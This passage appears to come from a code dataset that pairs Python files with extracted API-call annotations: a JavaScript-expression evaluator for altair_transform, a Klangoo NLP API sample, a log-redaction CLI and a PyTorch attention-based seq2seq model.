(['(8)', '(10)', '"""20.0"""'], {'id': '"""calculate_failures"""'}), "(8, 10, '20.0', id='calculate_failures')\n", (2358, 2398), False, 'import pytest\n'), ((2467, 2536), 'pytest.param', 'pytest.param', (['(0)', '(10)', '"""100.0"""'], {'id': '"""calculate_failures_with_0_failures"""'}), "(0, 10, '100.0', id='calculate_failures_with_0_failures')\n", (2479, 2536), False, 'import pytest\n'), ((2927, 2996), 'pytest.param', 'pytest.param', (['[]', '"""0.0"""', '{}'], {'id': '"""check_results_with_data_being_empty"""'}), "([], '0.0', {}, id='check_results_with_data_being_empty')\n", (2939, 2996), False, 'import pytest\n'), ((3065, 3189), 'pytest.param', 'pytest.param', (["['column_A']", '"""10.0"""', "{'column_A': '', '': '', 'Total': '10.0'}"], {'id': '"""check_results_with_one_data_element"""'}), "(['column_A'], '10.0', {'column_A': '', '': '', 'Total': '10.0'\n }, id='check_results_with_one_data_element')\n", (3077, 3189), False, 'import pytest\n'), ((3253, 
3419), 'pytest.param', 'pytest.param', (["['column_A', 'column_B']", '"""10.0"""', "{'column_A': '', 'column_B': '', '': '', 'Total': '10.0'}"], {'id': '"""check_results_with_more_than_one_data_element"""'}), "(['column_A', 'column_B'], '10.0', {'column_A': '', 'column_B':\n '', '': '', 'Total': '10.0'}, id=\n 'check_results_with_more_than_one_data_element')\n", (3265, 3419), False, 'import pytest\n'), ((383, 397), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (387, 397), False, 'from pathlib import Path\n'), ((512, 529), 'pathlib.Path', 'Path', (['FIXTURE_DIR'], {}), '(FIXTURE_DIR)\n', (516, 529), False, 'from pathlib import Path\n'), ((941, 956), 'pathlib.Path', 'Path', (['datafiles'], {}), '(datafiles)\n', (945, 956), False, 'from pathlib import Path\n'), ((4309, 4449), 'unittest.mock.call', 'call', ([], {'columns': "['Untested Columns', '% coverage']", 'data': "{'age': '', 'id': '', 'name': '', '': '', 'Total': '40.0'}", 'title': '"""Test Coverage"""'}), "(columns=['Untested Columns', '% coverage'], data={'age': '', 'id': '',\n 'name': '', '': '', 'Total': '40.0'}, title='Test Coverage')\n", (4313, 4449), False, 'from unittest.mock import call\n'), ((5594, 5744), 'unittest.mock.call', 'call', ([], {'columns': "['Model Name', '% coverage']", 'data': "{'dim_company': '40.0', 'stg_customers': '100.0', '': '', 'Total': '50.0'}", 'title': '"""Test Coverage"""'}), "(columns=['Model Name', '% coverage'], data={'dim_company': '40.0',\n 'stg_customers': '100.0', '': '', 'Total': '50.0'}, title='Test Coverage')\n", (5598, 5744), False, 'from unittest.mock import call\n'), ((7369, 7542), 'unittest.mock.call', 'call', ([], {'columns': "['Undocumented Columns', '% coverage']", 'data': "{'id': '', 'name': '', 'age': '', 'address': '', '': '', 'Total': '20.0'}", 'title': '"""Documentation Coverage"""'}), "(columns=['Undocumented Columns', '% coverage'], data={'id': '', 'name':\n '', 'age': '', 'address': '', '': '', 'Total': '20.0'}, title=\n 'Documentation 
Coverage')\n", (7373, 7542), False, 'from unittest.mock import call\n')] |
"""Functionality to evaluate contents of the ast"""
from functools import singledispatch, wraps
import operator
from typing import Any, Union
from altair_transform.utils import ast, Parser
__all__ = ['evaljs']
def evaljs(expression: Union[str, ast.Expr], namespace: dict = None) -> Any:
"""Evaluate a javascript expression, optionally with a namespace."""
if isinstance(expression, str):
parser = Parser()
expression = parser.parse(expression)
return visit(expression, namespace or {})
@singledispatch
def visit(obj: Any, namespace: dict) -> Any:
return obj
@visit.register
def _visit_expr(obj: ast.Expr, namespace: dict) -> Any:
return obj.value
@visit.register
def _visit_binop(obj: ast.BinOp, namespace: dict) -> Any:
if obj.op not in BINARY_OPERATORS:
raise NotImplementedError(f"Binary Operator A {obj.op} B")
op = BINARY_OPERATORS[obj.op]
return op(visit(obj.lhs, namespace), visit(obj.rhs, namespace))
@visit.register
def _visit_unop(obj: ast.UnOp, namespace: dict) -> Any:
if obj.op not in UNARY_OPERATORS:
raise NotImplementedError(f"Unary Operator {obj.op}x")
op = UNARY_OPERATORS[obj.op]
return op(visit(obj.rhs, namespace))
@visit.register
def _visit_ternop(obj: ast.TernOp, namespace: dict) -> Any:
if obj.op not in TERNARY_OPERATORS:
raise NotImplementedError(
f"Ternary Operator A {obj.op[0]} B {obj.op[1]} C")
op = TERNARY_OPERATORS[obj.op]
return op(visit(obj.lhs, namespace),
visit(obj.mid, namespace),
visit(obj.rhs, namespace))
@visit.register
def _visit_number(obj: ast.Number, namespace: dict) -> Any:
return obj.value
@visit.register
def _visit_string(obj: ast.String, namespace: dict) -> Any:
    """Evaluate a string literal."""
    return obj.value
@visit.register
def _visit_global(obj: ast.Global, namespace: dict) -> Any:
    """Resolve a global identifier against the evaluation namespace."""
    name = obj.name
    if name in namespace:
        return namespace[name]
    raise NameError("{0} is not a valid name".format(name))
@visit.register
def _visit_name(obj: ast.Name, namespace: dict) -> Any:
    """Evaluate a bare name node to its identifier string (no namespace lookup)."""
    return obj.name
@visit.register
def _visit_list(obj: ast.List, namespace: dict) -> Any:
    """Evaluate a list literal by evaluating each entry in order."""
    return [visit(entry, namespace) for entry in obj.entries]
@visit.register
def _visit_object(obj: ast.Object, namespace: dict) -> Any:
    """Evaluate an object literal into a Python dict."""
    def _visit(entry):
        # Explicit (key, value) pair: evaluate both sides.
        if isinstance(entry, tuple):
            return tuple(visit(e, namespace) for e in entry)
        # Shorthand entry {x}: the key is the name itself and the value is
        # looked up in the namespace via a Global node.
        # NOTE(review): entries of any other type fall through and yield
        # None, which dict() will reject — presumably unreachable; confirm.
        if isinstance(entry, ast.Name):
            return (visit(entry, namespace),
                    visit(ast.Global(entry.name), namespace))
    return dict(_visit(entry) for entry in obj.entries)
@visit.register
def _visit_attr(obj: ast.Attr, namespace: dict) -> Any:
    """Evaluate attribute access: dicts are subscripted, others use getattr."""
    target = visit(obj.obj, namespace)
    attr_name = visit(obj.attr, namespace)
    return target[attr_name] if isinstance(target, dict) else getattr(target, attr_name)
@visit.register
def _visit_item(obj: ast.Item, namespace: dict) -> Any:
    """Evaluate subscript access; float indices into lists are truncated to int."""
    container = visit(obj.obj, namespace)
    key = visit(obj.item, namespace)
    # JS numbers are modeled as floats, but Python lists require int indices.
    if isinstance(container, list) and isinstance(key, float):
        return container[int(key)]
    return container[key]
@visit.register
def _visit_func(obj: ast.Func, namespace: dict) -> Any:
    """Evaluate a call node: resolve the callee, then evaluate each argument."""
    callee = visit(obj.func, namespace)
    evaluated_args = (visit(arg, namespace) for arg in obj.args)
    return callee(*evaluated_args)
def int_inputs(func):
    """Decorator: truncate all arguments to int and coerce the result to float.

    Used to emulate JavaScript bitwise operators, which work on integers
    even though numbers are otherwise modeled as floats.
    """
    @wraps(func)
    def wrapper(*args):
        coerced = [int(a) for a in args]
        return float(func(*coerced))
    return wrapper
@int_inputs
def zerofill_rshift(lhs: int, rhs: int) -> int:
    """Emulate JavaScript's zero-fill right shift (>>>) on 32-bit values."""
    # Map negative values into the unsigned 32-bit range before shifting.
    unsigned = lhs if lhs >= 0 else lhs + 0x100000000
    return unsigned >> rhs
# TODO: do implicit type conversions ugh...
# Lookup tables mapping JavaScript operator tokens to Python callables.
# Bitwise operators are wrapped with int_inputs because JS coerces their
# operands to integers, while this evaluator models numbers as floats.
UNARY_OPERATORS = {
    '~': int_inputs(operator.inv),
    '-': operator.neg,
    '+': operator.pos,
    '!': operator.not_,
}
BINARY_OPERATORS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
    "**": operator.pow,
    "%": operator.mod,
    "&": int_inputs(operator.and_),
    "|": int_inputs(operator.or_),
    "^": int_inputs(operator.xor),
    "<<": int_inputs(operator.lshift),
    ">>": int_inputs(operator.rshift),
    ">>>": zerofill_rshift,
    "<": operator.lt,
    "<=": operator.le,
    ">": operator.gt,
    ">=": operator.ge,
    # NOTE(review): '==' and '===' (and '!=' / '!==') are mapped to the same
    # Python comparison, so JS loose vs. strict equality is not distinguished.
    "==": operator.eq,
    "===": operator.eq,
    "!=": operator.ne,
    "!==": operator.ne,
    # Short-circuit semantics are approximated; both operands are already
    # evaluated by the time the lambda runs (see _visit_binop).
    "&&": lambda a, b: a and b,
    "||": lambda a, b: a or b,
}
TERNARY_OPERATORS = {
    ("?", ":"): lambda a, b, c: b if a else c
}
| [
"altair_transform.utils.ast.Global",
"altair_transform.utils.Parser",
"functools.wraps"
] | [((3350, 3361), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (3355, 3361), False, 'from functools import singledispatch, wraps\n'), ((417, 425), 'altair_transform.utils.Parser', 'Parser', ([], {}), '()\n', (423, 425), False, 'from altair_transform.utils import ast, Parser\n'), ((2547, 2569), 'altair_transform.utils.ast.Global', 'ast.Global', (['entry.name'], {}), '(entry.name)\n', (2557, 2569), False, 'from altair_transform.utils import ast, Parser\n')] |
#!/usr/bin/env python
# -- coding: UTF-8 --
"""
Magnet API NLP Sample
Copyright 2018, Klangoo Inc.
"""
from klangooclient.MagnetAPIClient import MagnetAPIClient
# Magnet API service endpoint and account credentials.
# Fill in CALK and SECRET_KEY before running this sample.
ENDPOINT = 'https://nlp.klangoo.com/Service.svc'
CALK = 'enter your calk here'
SECRET_KEY = 'enter your secret key here'
# Shared client instance used by all the demo functions below.
client = MagnetAPIClient(ENDPOINT, CALK, SECRET_KEY)
# Sample text shared by every demo call below.
SAMPLE_TEXT = ('The United States of America (USA), commonly known as the '
               'United States (U.S.) or America, is a federal republic '
               'composed of 50 states, a federal district, five major '
               'self-governing territories, and various possessions.')


def _call_method(method_name, label):
    """Call one Magnet API web method on the sample text and print the result.

    Args:
        method_name: Magnet web method name, e.g. 'GetSummary'.
        label: human-readable heading printed before the JSON response.
    """
    request = {'text': SAMPLE_TEXT, 'lang': 'en', 'format': 'json'}
    json = client.callwebmethod(method_name, request, 'POST')
    print('\n' + label + ':')
    print(json)


def test_process_document():
    """Demo: full NLP processing of the sample document."""
    _call_method('ProcessDocument', 'Process Document')


def test_get_summary():
    """Demo: extract a summary of the sample document."""
    _call_method('GetSummary', 'Get Summary')


def test_get_entities():
    """Demo: extract named entities from the sample document."""
    _call_method('GetEntities', 'Get Entities')


def test_get_categories():
    """Demo: classify the sample document into categories."""
    _call_method('GetCategories', 'Get Categories')


def test_get_key_topics():
    """Demo: extract key topics from the sample document."""
    _call_method('GetKeyTopics', 'Get Key Topics')


if __name__ == "__main__":
    test_process_document()
    test_get_summary()
    test_get_entities()
    test_get_categories()
    test_get_key_topics()
"klangooclient.MagnetAPIClient.MagnetAPIClient"
] | [((301, 344), 'klangooclient.MagnetAPIClient.MagnetAPIClient', 'MagnetAPIClient', (['ENDPOINT', 'CALK', 'SECRET_KEY'], {}), '(ENDPOINT, CALK, SECRET_KEY)\n', (316, 344), False, 'from klangooclient.MagnetAPIClient import MagnetAPIClient\n')] |
"""log_redaction_cli
Usage:
log_redaction_cli.py --tarfile <tarfile> --working-dir <working-dir> --output-dir <output-dir>
log_redaction_cli.py (-h | --help)
log_redaction_cli.py --version
Options:
-h --help Pass in a string: example command: python log_redaction_cli.py --tarfile "test/files/test_output.tar.gz" --working-dir "/home/kalab/github/stringer/test/files" --output-dir log_redataction_example
--version v version
"""
from docopt import docopt
import stringer.utils.log_redaction_utils as log_redact
if __name__ == '__main__':
    # Parse CLI options according to the docopt spec in the module docstring.
    arguments = docopt(__doc__, version='0.0.9')
    tarfile_path = arguments.get("<tarfile>")
    working_dir = arguments.get("<working-dir>")
    output_dir = arguments.get("<output-dir>")
    perm_list = log_redact.process_gz(
        file=tarfile_path,
        working_dir=working_dir,
        output_gz_dir=output_dir,
    )
    print(str(perm_list))
| [
"docopt.docopt"
] | [((580, 612), 'docopt.docopt', 'docopt', (['__doc__'], {'version': '"""0.0.9"""'}), "(__doc__, version='0.0.9')\n", (586, 612), False, 'from docopt import docopt\n')] |
import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
import numpy as np
import torch.nn.functional as F
from attention import AdditiveAttention
class Encoder(nn.Module):
    """Encoder bi-GRU

    Embeds character sequences (optionally concatenated with word-level
    morphological and fasttext embeddings), runs a bidirectional GRU, and
    maps the final hidden state into the decoder's hidden space.
    """
    def __init__(self, input_dim, char_embed_dim,
                 encoder_hidd_dim,
                 decoder_hidd_dim,
                 num_layers,
                 morph_embeddings=None,
                 fasttext_embeddings=None,
                 char_padding_idx=0,
                 word_padding_idx=0,
                 dropout=0):
        """Build the encoder.

        Args:
            input_dim: character vocabulary size.
            char_embed_dim: character embedding dimensionality.
            encoder_hidd_dim: hidden size of each GRU direction.
            decoder_hidd_dim: target size for the linear map applied to the
                final encoder state before it seeds the decoder.
            num_layers: number of stacked GRU layers.
            morph_embeddings: optional pretrained word-level morphological
                embedding matrix (2-D: vocab x dim).
            fasttext_embeddings: optional pretrained fasttext matrix.
            char_padding_idx: padding index for character ids.
            word_padding_idx: padding index for word ids.
            dropout: inter-layer dropout (GRU only applies it when
                num_layers > 1).
        """
        super(Encoder, self).__init__()
        morph_embeddings_dim = 0
        self.morph_embedding_layer = None
        fasttext_embeddings_dim = 0
        self.fasttext_embedding_layer = None
        self.char_embedding_layer = nn.Embedding(input_dim,
                                                 char_embed_dim,
                                                 padding_idx=char_padding_idx)
        if morph_embeddings is not None:
            self.morph_embedding_layer = nn.Embedding.from_pretrained(morph_embeddings,
                                                                      padding_idx=word_padding_idx)
            morph_embeddings_dim = morph_embeddings.shape[1]
        if fasttext_embeddings is not None:
            self.fasttext_embedding_layer = nn.Embedding.from_pretrained(fasttext_embeddings)
            fasttext_embeddings_dim = fasttext_embeddings.shape[1]
        # GRU input is the concatenation of all active embedding streams.
        self.rnn = nn.GRU(input_size=char_embed_dim + morph_embeddings_dim + fasttext_embeddings_dim,
                          hidden_size=encoder_hidd_dim,
                          num_layers=num_layers,
                          batch_first=True,
                          bidirectional=True,
                          dropout=dropout if num_layers > 1 else 0.0)
        # Projects the concatenated forward+backward state into decoder space.
        self.linear_map = nn.Linear(encoder_hidd_dim * 2, decoder_hidd_dim)

    def forward(self, char_src_seqs, word_src_seqs, src_seqs_lengths):
        """Encode a batch of source sequences.

        Args:
            char_src_seqs: [batch_size, max_src_seq_len] character ids.
            word_src_seqs: word ids aligned with the character positions;
                only read when morph/fasttext layers are configured.
            src_seqs_lengths: true (unpadded) sequence lengths — expected in
                decreasing order (pack_padded_sequence default, enforce_sorted).

        Returns:
            (output, hidd): padded GRU outputs
            [batch_size, src_seqs_length, 2 * encoder_hidd_dim] and the
            tanh-mapped hidden state [num_layers, batch_size, decoder_hidd_dim].
        """
        embedded_seqs = self.char_embedding_layer(char_src_seqs)
        # embedded_seqs shape: [batch_size, max_src_seq_len, char_embed_dim]
        # Add morph embeddings to the char embeddings if needed
        if self.morph_embedding_layer is not None:
            embedded_word_seqs_morph = self.morph_embedding_layer(word_src_seqs)
            # embedded_word_seqs_morph shape: [batch_size, max_src_seq_len, morph_embeddings_dim]
            embedded_seqs = torch.cat((embedded_seqs, embedded_word_seqs_morph), dim=2)
            # embedded_seqs shape: [batch_size, max_src_seq_len, char_embed_dim + morph_embeddings_dim]
        # Add fasttext embeddings to the char embeddings if needed
        if self.fasttext_embedding_layer is not None:
            embedded_word_seqs_ft = self.fasttext_embedding_layer(word_src_seqs)
            # embedded_word_seqs_ft shape: [batch_size, max_src_seq_len, fasttext_embeddings_dim]
            embedded_seqs = torch.cat((embedded_seqs, embedded_word_seqs_ft), dim=2)
            # embedded_seqs shape: [batch_size, max_src_seq_len, char_embed_dim + fasttext_embeddings_dim]
        # packing the embedded_seqs
        packed_embedded_seqs = pack_padded_sequence(embedded_seqs, src_seqs_lengths, batch_first=True)
        output, hidd = self.rnn(packed_embedded_seqs)
        # hidd shape: [num_layers * num_dirs, batch_size, encoder_hidd_dim]
        # concatenating the forward and backward vectors for each layer
        # (even indices are forward directions, odd indices backward)
        hidd = torch.cat([hidd[0:hidd.size(0):2], hidd[1:hidd.size(0):2]], dim=2)
        # hidd shape: [num layers, batch_size, num_directions * encoder_hidd_dim]
        # mapping the encode hidd state to the decoder hidd dim space
        hidd = torch.tanh(self.linear_map(hidd))
        # unpacking the output
        output, lengths = pad_packed_sequence(output, batch_first=True)
        # output shape: [batch_size, src_seqs_length, num_dirs * encoder_hidd_dim]
        return output, hidd
class Decoder(nn.Module):
    """Decoder GRU
    Things to note:
        - The input to the decoder rnn at each time step is the
        concatenation of the embedded token and the context vector
        - The context vector will have a size of batch_size, encoder_hidd_dim * 2
        - The prediction layer input is the concatenation of
        the context vector and the h_t of the decoder
    """
    def __init__(self, input_dim, char_embed_dim,
                 decoder_hidd_dim, num_layers,
                 output_dim,
                 encoder_hidd_dim,
                 padding_idx=0,
                 embed_trg_gender=False,
                 gender_embeddings=None,
                 gender_input_dim=0,
                 gender_embed_dim=0,
                 dropout=0):
        """Build the attentional GRU decoder.

        Args:
            input_dim: target character vocabulary size.
            char_embed_dim: target character embedding dimensionality.
            decoder_hidd_dim: GRU hidden size.
            num_layers: number of stacked GRU layers.
            output_dim: size of the output (prediction) vocabulary.
            encoder_hidd_dim: per-direction encoder hidden size (context
                vectors are 2 * encoder_hidd_dim wide).
            padding_idx: padding index for target character ids.
            embed_trg_gender: if True, concatenate a target-gender embedding
                into the prediction vector.
            gender_embeddings: optional pretrained gender embedding matrix;
                when None a fresh nn.Embedding is learned.
            gender_input_dim / gender_embed_dim: shape of the learned gender
                embedding when no pretrained matrix is given.
            dropout: dropout on the prediction vector (and GRU inter-layer
                dropout when num_layers > 1).
        """
        super(Decoder, self).__init__()
        self.attention = AdditiveAttention(encoder_hidd_dim=encoder_hidd_dim,
                                           decoder_hidd_dim=decoder_hidd_dim)
        self.gender_embedding_layer = None
        if embed_trg_gender:
            if gender_embeddings is None:
                self.gender_embedding_layer = nn.Embedding(gender_input_dim, gender_embed_dim)
            else:
                self.gender_embedding_layer = nn.Embedding.from_pretrained(gender_embeddings)
        self.char_embedding_layer = nn.Embedding(input_dim,
                                                 char_embed_dim,
                                                 padding_idx=padding_idx)
        # the input to the rnn is the context_vector + embedded token --> embed_dim + hidd_dim
        self.rnn = nn.GRU(input_size=char_embed_dim + encoder_hidd_dim * 2,
                          hidden_size=decoder_hidd_dim,
                          num_layers=num_layers,
                          batch_first=True,
                          dropout=dropout if num_layers > 1 else 0.0)
        # the input to the classifier is h_t + context_vector + gender_embed_dim? --> hidd_dim * 2
        self.classification_layer = nn.Linear(encoder_hidd_dim * 2
                                              + decoder_hidd_dim * num_layers
                                              + gender_embed_dim + char_embed_dim, output_dim)
        self.dropout_layer = nn.Dropout(dropout)

    def forward(self, trg_seqs, encoder_outputs, decoder_h_t, context_vectors,
                attention_mask, trg_gender=None):
        """Run one decoding time step for the whole batch.

        Args:
            trg_seqs: [batch_size] target token ids for this step.
            encoder_outputs: encoder outputs used as attention keys.
            decoder_h_t: previous decoder hidden state.
            context_vectors: previous attention context
                [batch_size, encoder_hidd_dim * 2].
            attention_mask: mask over source positions for attention.
            trg_gender: optional target-gender ids (required when the gender
                embedding layer is configured).

        Returns:
            (prediction, decoder_h_t, atten_scores, context_vectors) — the
            output-vocabulary logits plus the updated recurrent state,
            attention scores, and new context vectors.
        """
        # trg_seqs shape: [batch_size]
        batch_size = trg_seqs.shape[0]
        trg_seqs = trg_seqs.unsqueeze(1)
        # trg_seqs shape: [batch_size, 1]
        # Step 1: embedding the target seqs
        embedded_seqs = self.char_embedding_layer(trg_seqs)
        # embedded_seqs shape: [batch_size, 1, embed_dim]
        # context_vectors shape: [batch_size, encoder_hidd_dim * 2]
        # changing shape to: [batch_size, 1, encoder_hidd_dim * 2]
        context_vectors = context_vectors.unsqueeze(1)
        # concatenating the embedded trg sequence with the context_vectors
        rnn_input = torch.cat((embedded_seqs, context_vectors), dim=2)
        # rnn_input shape: [batch_size, 1, embed_dim + encoder_hidd_dim * 2]
        # Step 2: feeding the input to the rnn and updating the decoder_h_t
        decoder_output, decoder_h_t = self.rnn(rnn_input, decoder_h_t)
        # decoder output shape: [batch_size, 1, num_dirs * hidd_dim]
        # decoder_h_t shape: [num_layers * num_dirs, batch_size, hidd_dim]
        # Step 3: updating the context vectors through attention
        context_vectors, atten_scores = self.attention(keys=encoder_outputs,
                                                       query=decoder_h_t,
                                                       mask=attention_mask)
        # Step 4: get the prediction vector
        # embed trg gender info if needed
        if self.gender_embedding_layer is not None:
            embedded_trg_gender = self.gender_embedding_layer(trg_gender)
            # embedded_trg_gender shape: [batch_size, gender_embed_dim]
            # concatenating decoder_h_t, context_vectors, and the
            # embedded_trg_gender to create a prediction vector
            if self.rnn.num_layers == 1:
                # sanity check: for a single layer, the step output equals
                # the (flattened) hidden state
                assert decoder_output.squeeze(1).eq(decoder_h_t.view(decoder_h_t.shape[1], -1)).all().item()
            predictions_vector = torch.cat((decoder_h_t.view(decoder_h_t.shape[1], -1),
                                            context_vectors, embedded_trg_gender,
                                            embedded_seqs.squeeze(1)), dim=1)
            # predictions_vector: [batch_size, hidd_dim + encoder_hidd_dim * 2 + gender_embed_dim]
        else:
            # concatenating decoder_h_t with context_vectors to
            # create a prediction vector
            predictions_vector = torch.cat((decoder_h_t.view(decoder_h_t.shape[1], -1),
                                            context_vectors, embedded_seqs.squeeze(1)), dim=1)
            # predictions_vector: [batch_size, hidd_dim + encoder_hidd_dim * 2]
        # Step 5: feeding the prediction vector to the fc layer
        # to a make a prediction
        # apply dropout if needed
        predictions_vector = self.dropout_layer(predictions_vector)
        prediction = self.classification_layer(predictions_vector)
        # prediction shape: [batch_size, output_dim]
        return prediction, decoder_h_t, atten_scores, context_vectors
class Seq2Seq(nn.Module):
    """Seq2Seq model

    Wires the bi-GRU Encoder and the attentional Decoder together and runs
    the full teacher-forced / sampled decoding loop over a target sequence.
    """
    def __init__(self, encoder_input_dim, encoder_embed_dim,
                 encoder_hidd_dim, encoder_num_layers,
                 decoder_input_dim, decoder_embed_dim,
                 decoder_hidd_dim, decoder_num_layers,
                 decoder_output_dim,
                 morph_embeddings=None, fasttext_embeddings=None,
                 gender_embeddings=None,
                 embed_trg_gender=False, gender_input_dim=0,
                 gender_embed_dim=0, char_src_padding_idx=0,
                 word_src_padding_idx=0, trg_padding_idx=0,
                 dropout=0, trg_sos_idx=2):
        """Build the encoder/decoder pair; parameters are forwarded to
        Encoder and Decoder (see their docstrings).

        Note: decoder_output_dim is accepted but the Decoder's output_dim is
        set to decoder_input_dim (shared source/target character vocab).
        """
        super(Seq2Seq, self).__init__()
        self.encoder = Encoder(input_dim=encoder_input_dim,
                               char_embed_dim=encoder_embed_dim,
                               encoder_hidd_dim=encoder_hidd_dim,
                               decoder_hidd_dim=decoder_hidd_dim,
                               num_layers=encoder_num_layers,
                               morph_embeddings=morph_embeddings,
                               fasttext_embeddings=fasttext_embeddings,
                               char_padding_idx=char_src_padding_idx,
                               word_padding_idx=word_src_padding_idx,
                               dropout=dropout)
        self.decoder = Decoder(input_dim=decoder_input_dim,
                               char_embed_dim=decoder_embed_dim,
                               decoder_hidd_dim=decoder_hidd_dim,
                               num_layers=decoder_num_layers,
                               encoder_hidd_dim=encoder_hidd_dim,
                               output_dim=decoder_input_dim,
                               padding_idx=trg_padding_idx,
                               embed_trg_gender=embed_trg_gender,
                               gender_input_dim=gender_input_dim,
                               gender_embed_dim=gender_embed_dim,
                               gender_embeddings=gender_embeddings,
                               dropout=dropout)
        self.char_src_padding_idx = char_src_padding_idx
        self.trg_sos_idx = trg_sos_idx
        # Multiplier applied to logits before sampling to sharpen the
        # softmax when feeding back model predictions (non-teacher-forced).
        self.sampling_temperature = 3

    def create_mask(self, src_seqs, src_padding_idx):
        """Return a boolean mask that is True at non-padding source positions."""
        mask = (src_seqs != src_padding_idx)
        return mask

    def forward(self, char_src_seqs, word_src_seqs, src_seqs_lengths, trg_seqs,
                trg_gender=None, teacher_forcing_prob=0.3):
        """Encode the source batch and decode the full target sequence.

        Args:
            char_src_seqs, word_src_seqs, src_seqs_lengths: encoder inputs
                (see Encoder.forward).
            trg_seqs: [batch_size, trg_seqs_length] gold target ids.
            trg_gender: optional target-gender ids for the decoder.
            teacher_forcing_prob: per-step probability of feeding the gold
                token instead of the model's own prediction.

        Returns:
            (predictions, decoder_attention_scores) with shapes
            [batch_size, trg_seq_len, output_dim] and
            [batch_size, trg_seq_len, src_seq_len].
        """
        # trg_seqs shape: [batch_size, trg_seqs_length]
        # reshaping to: [trg_seqs_length, batch_size]
        trg_seqs = trg_seqs.permute(1, 0)
        trg_seqs_length, batch_size = trg_seqs.shape
        # passing the src to the encoder
        encoder_outputs, encoder_hidd = self.encoder(char_src_seqs, word_src_seqs, src_seqs_lengths)
        # creating attention masks
        attention_mask = self.create_mask(char_src_seqs, self.char_src_padding_idx)
        predictions = []
        decoder_attention_scores = []
        # initializing the trg_seqs to <s> token
        y_t = torch.ones(batch_size, dtype=torch.long) * self.trg_sos_idx
        # intializing the context_vectors to zero
        context_vectors = torch.zeros(batch_size, self.encoder.rnn.hidden_size * 2)
        # context_vectors shape: [batch_size, encoder_hidd_dim * 2]
        # initializing the hidden state of the decoder to the encoder hidden state
        decoder_h_t = encoder_hidd
        # decoder_h_t shape: [batch_size, decoder_hidd_dim]
        # moving y_t and context_vectors to the right device
        y_t = y_t.to(encoder_hidd.device)
        context_vectors = context_vectors.to(encoder_hidd.device)
        for i in range(0, trg_seqs_length):
            # per-step coin flip for teacher forcing
            teacher_forcing = np.random.random() < teacher_forcing_prob
            # if teacher_forcing, use ground truth target tokens
            # as an input to the decoder
            if teacher_forcing:
                y_t = trg_seqs[i]
            # do a single decoder step
            prediction, decoder_h_t, atten_scores, context_vectors = self.decoder(trg_seqs=y_t,
                                                                                  trg_gender=trg_gender,
                                                                                  encoder_outputs=encoder_outputs,
                                                                                  decoder_h_t=decoder_h_t,
                                                                                  context_vectors=context_vectors,
                                                                                  attention_mask=attention_mask)
            # If not teacher force, use the maximum
            # prediction as an input to the decoder in
            # the next time step
            if not teacher_forcing:
                # we multiply the predictions with a sampling_temperature
                # to make the probablities peakier, so we can be confident about the
                # maximum prediction
                pred_output_probs = F.softmax(prediction * self.sampling_temperature, dim=1)
                y_t = torch.argmax(pred_output_probs, dim=1)
            predictions.append(prediction)
            decoder_attention_scores.append(atten_scores)
        predictions = torch.stack(predictions)
        # predictions shape: [trg_seq_len, batch_size, output_dim]
        predictions = predictions.permute(1, 0, 2)
        # predictions shape: [batch_size, trg_seq_len, output_dim]
        decoder_attention_scores = torch.stack(decoder_attention_scores)
        # attention_scores_total shape: [trg_seq_len, batch_size, src_seq_len]
        decoder_attention_scores = decoder_attention_scores.permute(1, 0, 2)
        # attention_scores_total shape: [batch_size, trg_seq_len, src_seq_len]
        return predictions, decoder_attention_scores
| [
"torch.nn.functional.softmax",
"torch.nn.Dropout",
"torch.ones",
"numpy.random.random",
"torch.stack",
"attention.AdditiveAttention",
"torch.argmax",
"torch.cat",
"torch.nn.utils.rnn.pack_padded_sequence",
"torch.nn.Linear",
"torch.nn.Embedding.from_pretrained",
"torch.nn.utils.rnn.pad_packed_... | [((822, 891), 'torch.nn.Embedding', 'nn.Embedding', (['input_dim', 'char_embed_dim'], {'padding_idx': 'char_padding_idx'}), '(input_dim, char_embed_dim, padding_idx=char_padding_idx)\n', (834, 891), True, 'import torch.nn as nn\n'), ((1507, 1738), 'torch.nn.GRU', 'nn.GRU', ([], {'input_size': '(char_embed_dim + morph_embeddings_dim + fasttext_embeddings_dim)', 'hidden_size': 'encoder_hidd_dim', 'num_layers': 'num_layers', 'batch_first': '(True)', 'bidirectional': '(True)', 'dropout': '(dropout if num_layers > 1 else 0.0)'}), '(input_size=char_embed_dim + morph_embeddings_dim +\n fasttext_embeddings_dim, hidden_size=encoder_hidd_dim, num_layers=\n num_layers, batch_first=True, bidirectional=True, dropout=dropout if \n num_layers > 1 else 0.0)\n', (1513, 1738), True, 'import torch.nn as nn\n'), ((1882, 1931), 'torch.nn.Linear', 'nn.Linear', (['(encoder_hidd_dim * 2)', 'decoder_hidd_dim'], {}), '(encoder_hidd_dim * 2, decoder_hidd_dim)\n', (1891, 1931), True, 'import torch.nn as nn\n'), ((3197, 3268), 'torch.nn.utils.rnn.pack_padded_sequence', 'pack_padded_sequence', (['embedded_seqs', 'src_seqs_lengths'], {'batch_first': '(True)'}), '(embedded_seqs, src_seqs_lengths, batch_first=True)\n', (3217, 3268), False, 'from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n'), ((3815, 3860), 'torch.nn.utils.rnn.pad_packed_sequence', 'pad_packed_sequence', (['output'], {'batch_first': '(True)'}), '(output, batch_first=True)\n', (3834, 3860), False, 'from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n'), ((4843, 4935), 'attention.AdditiveAttention', 'AdditiveAttention', ([], {'encoder_hidd_dim': 'encoder_hidd_dim', 'decoder_hidd_dim': 'decoder_hidd_dim'}), '(encoder_hidd_dim=encoder_hidd_dim, decoder_hidd_dim=\n decoder_hidd_dim)\n', (4860, 4935), False, 'from attention import AdditiveAttention\n'), ((5334, 5398), 'torch.nn.Embedding', 'nn.Embedding', (['input_dim', 'char_embed_dim'], {'padding_idx': 
